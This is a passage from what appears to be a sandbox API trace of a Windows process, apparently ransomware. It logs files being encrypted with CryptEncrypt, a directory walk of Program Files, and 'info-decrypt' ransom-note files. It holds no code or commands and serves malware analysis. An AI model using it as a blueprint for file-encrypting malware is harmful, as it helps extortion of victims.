dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f650) returned 1 [0215.069] CryptContextAddRef (hProv=0xbe0c68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0215.069] CryptContextAddRef (hProv=0xbe0c68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0215.069] CryptDuplicateKey (in: hKey=0xb7f650, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f310) returned 1 [0215.069] CryptContextAddRef (hProv=0xbe0c68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0215.069] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x4, pbData=0x3614738*=0x1, dwFlags=0x0) returned 1 [0215.069] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x1, pbData=0x3614704, dwFlags=0x0) returned 1 [0215.074] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b764ec8*, pdwDataLen=0x6d8ed78*=0x10ca60, dwBufLen=0x10ca60 | out: pbData=0x1b764ec8*, pdwDataLen=0x6d8ed78*=0x10ca60) returned 1 [0215.446] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3614760*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x3614760*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0215.448] CryptDestroyKey (hKey=0xb7f650) returned 1 [0215.448] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0215.448] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0215.448] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", lpFilePart=0x0) returned 0x41 [0215.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0215.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0215.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8db20) returned 1 [0215.450] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", lpFilePart=0x0) returned 0x3e [0215.450] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0215.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0215.450] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc7aa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35bc7aa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x35bc7aa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0215.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0215.451] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", lpFilePart=0x0) returned 0x3e [0215.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0215.451] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), fInfoLevelId=0x0, lpFileInformation=0x3615568 | out: lpFileInformation=0x3615568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94dbb3, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3d94dbb3, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3c28ab1e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x2e99a0)) returned 1 [0215.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0215.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", lpFilePart=0x0) returned 0x3e [0215.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0215.611] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0215.611] GetFileType (hFile=0x31c) returned 0x1 [0215.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0215.611] GetFileType (hFile=0x31c) returned 0x1 [0215.611] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x2e99a0 [0215.611] ReadFile (hFile=0x31c, lpBuffer=0x1b871948, nNumberOfBytesToRead=0x2e99a0, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0) Thread: id = 116 os_tid = 0x6fc [0132.109] SysReAllocStringLen (in: pbstr=0x8f6f644*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x8f6f644*="KERNEL32.DLL") returned 1 [0132.109] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.110] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.112] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.113] SysReAllocStringLen (in: pbstr=0x8f6f644*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x8f6f644*="KERNEL32.DLL") returned 1 [0132.113] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.113] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.115] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.116] SysReAllocStringLen (in: pbstr=0x8f6f620*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x8f6f620*="KERNEL32.DLL") returned 1 [0132.116] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.116] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.118] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0132.121] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.122] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0132.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6f06c) returned 1 [0132.122] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x105, lpBuffer=0x8f6eb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0132.122] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x105, lpBuffer=0x8f6eb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x0) returned 0x17 [0132.122] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x8f6ed94 | out: lpFindFileData=0x8f6ed94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.123] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.123] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf40b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf40b40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0132.123] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6b59520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6b59520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0132.123] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0132.123] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xe62b8560, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe62b8560, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0132.123] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd23a40, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0132.124] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6161900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6161900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0132.124] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xe0a7f600, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a7f600, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0132.124] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe658bf80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe658bf80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0132.124] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef0a44f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0132.124] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe6b59520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6b59520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Visual Studio 8", cAlternateFileName="MICROS~3")) returned 1 [0132.124] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xeab061a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xeab061a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0132.125] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xe69904a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe69904a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0132.125] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xe62b8560, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe62b8560, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Maintenance Service", cAlternateFileName="MOZILL~2")) returned 1 [0132.125] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe696a340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe696a340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0132.125] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe63e9060, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe63e9060, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0132.125] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xe69904a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe69904a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0132.125] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xeab061a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xeab061a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0132.126] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6187a60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6187a60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0132.126] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe626c2a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe626c2a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0132.126] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6b59520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6b59520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0132.126] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe5fbe9e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe5fbe9e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0132.126] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe4bcf1a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4bcf1a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0132.126] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe46e6440, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe46e6440, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0132.127] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe46e6440, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe46e6440, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0132.127] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6f02c) returned 1 [0132.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6f038) returned 1 [0132.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6f06c) returned 1 [0132.127] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x105, lpBuffer=0x8f6eb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0132.127] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x105, lpBuffer=0x8f6eb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x0) returned 0x17 [0132.127] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x8f6ed94 | out: lpFindFileData=0x8f6ed94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.127] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.128] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf40b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf40b40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0132.128] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6b59520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6b59520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0132.128] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, 